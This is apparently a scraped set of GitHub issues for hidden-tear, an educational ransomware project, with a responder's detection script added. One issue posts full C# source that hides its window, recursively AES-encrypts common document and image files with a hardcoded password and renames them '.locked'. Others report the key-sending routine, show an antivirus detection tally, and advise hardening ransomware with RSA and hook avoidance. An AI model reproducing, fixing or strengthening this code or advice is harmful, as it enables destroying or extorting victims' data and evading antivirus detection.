hidden-tear's Issues

How to compile?

Microsoft Visual C# 2010 does not compile. Tell me what to compile?

write.php

Hello,

Where can we get a copy of the write.php file to test.

Thank you.

404 not found

Hello,

After building and naming it MyThing, using localhost for test, I get the following error.

Unhandled exception has occurred in your application. If you click Continue, the application will ignore this error and attempt to continue. If you click Quit, the application will close immediately.

The remote server returned an error: (404) Not Found.
See the end of this message for details on invoking
just-in-time (JIT) debugging instead of this dialog box.

************** Exception Text **************
System.Net.WebException: The remote server returned an error: (404) Not Found.
at System.Net.WebClient.DownloadDataInternal(Uri address, WebRequest& request)
at System.Net.WebClient.DownloadString(Uri address)
at System.Net.WebClient.DownloadString(String address)
at hidden_tear.Form1.SendPassword(String password)
at hidden_tear.Form1.startAction()
at hidden_tear.Form1.Form1_Load(Object sender, EventArgs e)
at System.Windows.Forms.Form.OnLoad(EventArgs e)
at System.Windows.Forms.Form.OnCreateControl()
at System.Windows.Forms.Control.CreateControl(Boolean fIgnoreVisible)
at System.Windows.Forms.Control.CreateControl()
at System.Windows.Forms.Control.WmShowWindow(Message& m)
at System.Windows.Forms.Control.WndProc(Message& m)
at System.Windows.Forms.ScrollableControl.WndProc(Message& m)
at System.Windows.Forms.Form.WmShowWindow(Message& m)
at System.Windows.Forms.Form.WndProc(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)

Update: Detection Rate 7/35 2015-09-15

File Name: hidden-tear.exe
File Size: 12 KB
Scan Date: 2015-09-15
Scan Result: 7/35

MD5: 94ce7ab77e933c83410b38e455cd0b91
Verified By NoDistribute: Virus Scan Result

AVG Free: Could be a Trojan horse Cryptic
Avast: MSIL:Ransom-J [Trj]
AntiVir (Avira): Clean
BitDefender: Clean
Clam Antivirus: Clean
COMODO Internet Security: Clean
Dr.Web: Clean
eTrust-Vet: Clean
F-PROT Antivirus: Clean
F-Secure Internet Security: Clean
G Data: MSIL.Trojan-Ransom.Cryptear.A
IKARUS Security: Clean
Kaspersky Antivirus: HEUR:Trojan.Win32.Generic
McAfee: Ransomware-FAL!94CE7AB77E93
MS Security Essentials: Clean
ESET NOD32: Trojan.MSIL/Filecoder.Y
Norman: Clean
Norton Antivirus: Trojan.Cryptolocker.Y
Panda Security: Clean
A-Squared: Clean
Quick Heal Antivirus: Clean
Solo Antivirus: Clean
Sophos: Clean
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Zoner AntiVirus: Clean
Ad-Aware: Clean
BullGuard: Clean
FortiClient: Clean
K7 Ultimate: Clean
NANO Antivirus: Clean
Panda CommandLine: Clean
SUPERAntiSpyware: Clean
Twister Antivirus: Clean
VIPRE: Clean

Video Tuto Request

Could you share how to build the hidden-tear executable in a video tutorial like the demonstration one?

Very much appreciated.
A

License

@utkusen, despite the legal warning, I'm not comfortable using/extending this project without a license.

Do you have the intention of setting this project as open source?

Errors

Hey, I wanted to make a cool folder encryptor as a fun project and I then came across hidden-tear.
I was trying to encrypt a directory with an inbuilt key. Check it out:

using System;
using System.Net;
using System.Diagnostics;
using System.Collections.Generic;
using System.Data;
using System.Drawing;
using System.Linq;
using System.ComponentModel;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Text;
using System.Security;
using System.Security.Cryptography;
using System.IO;
using System.Runtime.InteropServices;
using Microsoft.Win32;
using System.Text.RegularExpressions;


namespace folderlocker
{
    public partial class Form1 : Form
    {
        string dir = "C:\test";

        public Form1()
        {
            InitializeComponent();
        }

        private void Form1_Load(object sender, EventArgs e)
        {
            Opacity = 0;
            this.ShowInTaskbar = false;
            //starts encryption at form load
            shebang();

        }

        private void Form_Shown(object sender, EventArgs e)
        {
            Visible = false;
            Opacity = 100;
        }

        //AES encryption algorithm
        public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes)
        {
            byte[] encryptedBytes = null;
            byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };
            using (MemoryStream ms = new MemoryStream())
            {
                using (RijndaelManaged AES = new RijndaelManaged())
                {
                    AES.KeySize = 256;
                    AES.BlockSize = 128;

                    var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000);
                    AES.Key = key.GetBytes(AES.KeySize / 8);
                    AES.IV = key.GetBytes(AES.BlockSize / 8);

                    AES.Mode = CipherMode.CBC;

                    using (var cs = new CryptoStream(ms, AES.CreateEncryptor(), CryptoStreamMode.Write))
                    {
                        cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
                        cs.Close();
                    }
                    encryptedBytes = ms.ToArray();
                }
            }

            return encryptedBytes;
        }

        //Encrypts single file
        public void ef(string file, string password)
        {

            byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
            byte[] passwordBytes = Encoding.UTF8.GetBytes(password);

            // Hash the password with SHA256
            passwordBytes = SHA256.Create().ComputeHash(passwordBytes);

            byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes);

            File.WriteAllBytes(file, bytesEncrypted);
            System.IO.File.Move(file, file + ".locked");
        }

        //encrypts target directory
        public void ed(string location, string password)
        {

            //extensions to be encrypt
            var validbroz = new[]
            {
                ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"
            };

            string[] files = Directory.GetFiles(location);
            string[] childDirectories = Directory.GetDirectories(location);
            for (int i = 0; i < files.Length; i++)
            {
                string extension = Path.GetExtension(files[i]);
                if (validbroz.Contains(extension))
                {
                    ef(files[i], password);
                }
            }
            for (int i = 0; i < childDirectories.Length; i++)
            {
                ed(childDirectories[i], password);
            }
        }

        public void shebang()
        {
            string password = "loda123";
            ed(dir, password);
            password = null;
            System.Windows.Forms.Application.Exit();
        }

    }
}

However it doesn't encrypt the test directory, what is going wrong here?
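
A triage sketch for responders, added here and not part of the original issue or of hidden-tear: it looks for the on-disk traces that the code posted above would leave (a ".locked" suffix appended to a targeted extension, a size that is a whole number of AES blocks, near-random content). The entropy threshold, sample size and function names are assumptions, and the check goes one step beyond the post by separating benign files that merely share the suffix.

```python
import math
import os
import tempfile
from collections import Counter

# Indicators taken from the code posted above: the ".locked" suffix, the
# targeted extension list, and AES-CBC with a 128-bit block size.
TARGET_EXTS = set((".txt .doc .docx .xls .xlsx .ppt .pptx .odt .jpg .png "
                   ".csv .sql .mdb .sln .php .asp .aspx .html .xml .psd").split())
SUFFIX, AES_BLOCK = ".locked", 16

def shannon_entropy(data):
    n = len(data)  # bits per byte; ciphertext sits close to 8.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def classify(path, sample=65536, min_entropy=7.0):  # thresholds are assumptions
    """Return the indicators one file matches (empty list if none)."""
    name = os.path.basename(path).lower()
    if not name.endswith(SUFFIX):
        return []
    hits = ["suffix"]
    if os.path.splitext(name[:-len(SUFFIX)])[1] in TARGET_EXTS:
        hits.append("targeted-extension")
    size = os.path.getsize(path)
    if size and size % AES_BLOCK == 0:  # CBC with padding writes whole blocks
        hits.append("block-aligned")
    with open(path, "rb") as fh:
        if shannon_entropy(fh.read(sample)) >= min_entropy:
            hits.append("high-entropy")
    return hits

def scan(root):
    """Walk root and map relative path -> matched indicators."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for f in files:
            full = os.path.join(dirpath, f)
            hits = classify(full)
            if hits:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings[rel] = hits
    return findings

def demo():
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "sub"))
        samples = {"sub/report.docx.locked": os.urandom(4096),  # constructed inputs
                   "notes.txt": b"plain text\n" * 100, "door.locked": b"A" * 33}
        for rel, data in samples.items():
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(data)
        return scan(root)
```

A file that matches all four indicators deserves attention first; one that matches only the suffix is more likely unrelated.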

Weak encryption implementation

Encrypting using the symmetric codeschema is weak since the program is vulnerable to all kinds of injections and attacks. Since the entire encryption occurs on the client side a virusscanner (of sorts) could easily hook in, even after the event.

  • The generated password is way too short and can be tried within a reasonable (69^15) amount of time.
  • Because you trust on a symmetric codeschema the password must be present somewhere and can (especially with a language like C#) be retrieved quite easily from a memory dump.
  • Moving (encrypted) files around only changes the file descriptor towards the modifications, but does not actually alter the entire datablock which makes it easy to recover the original files by walking over the physical pages.
  • Since C# relies for the most part on the .NET framework, basically all operations can be monitored or reverted with little effort (opcodes have some degree of transparency).

Ransomware like CryptoLocker (one of the most successful cryptoviruses we know so far) take on an entirely different approach. They trust on asymmetric encryption, specifically RSA, in which the private key never reaches the client system. This is much more secure since it's only the public key that needs to be exchanged between the parties. Also, you should write directly against the system libraries where needed to prevent hooks from listening in on communication. Supply your own crypto functions or use an open library instead. This all usually leads to a language with a lower abstraction level, for example C/C++.

There is the argument of complexity for these measures, but 'keeping things simple' is something you cannot afford in these areas where basically everything revolves around security. As for the education; this could barely pass as an encryption tool, never less malicious software.

How it works?

If I understood from the readme, it simply encrypts the file using AES, which uses symmetric keys. Is it just that? Real ransomware uses asymmetric schemes, so even if the connection is MITM-ed (some corporate proxy which logs even HTTPS requests) or in case of reverse engineering it isn't possible to decrypt files.

Of course asymmetric cryptography doesn't work for large files out of the box, so you either need to encrypt just part of the file, sufficient to make it not utilizable anymore (a ransomware-like scheme), or encrypt the AES key using a public key generated on the server (a PGP-like scheme), but that requires more security in order to avoid the AES key being retrieved without the private key.

I don't understand C# well, so I want to know how it works, specifically: does it just encrypt with AES or use one of the schemes above?

Write.php

Hello,

Where can we get a copy of the write.php file to test.

Thank you.

Multiple folders bug

Just reading the code, it appears to me that in case of multiple folders you'll most probably definitely lose the passwords but one. Due to the usage of sendControl variable...

Nice demo though, for wanna-be black/white hats!

Congratz!

Just wanted to congratulate you for your file encryption program. I did not understand why you called your file encryption program as ransomware tho.

Also this is just a legit file encryption, if this program without modification gets caught by any antivirus this is definitely a false/positive.

Illegal characters in path error?

Can someone please help me? I crypted my files and cannot decrypt it anymore..
I get the correct decrypt password in my txt file but when i try to decrypt with decryptor it gives me this error:
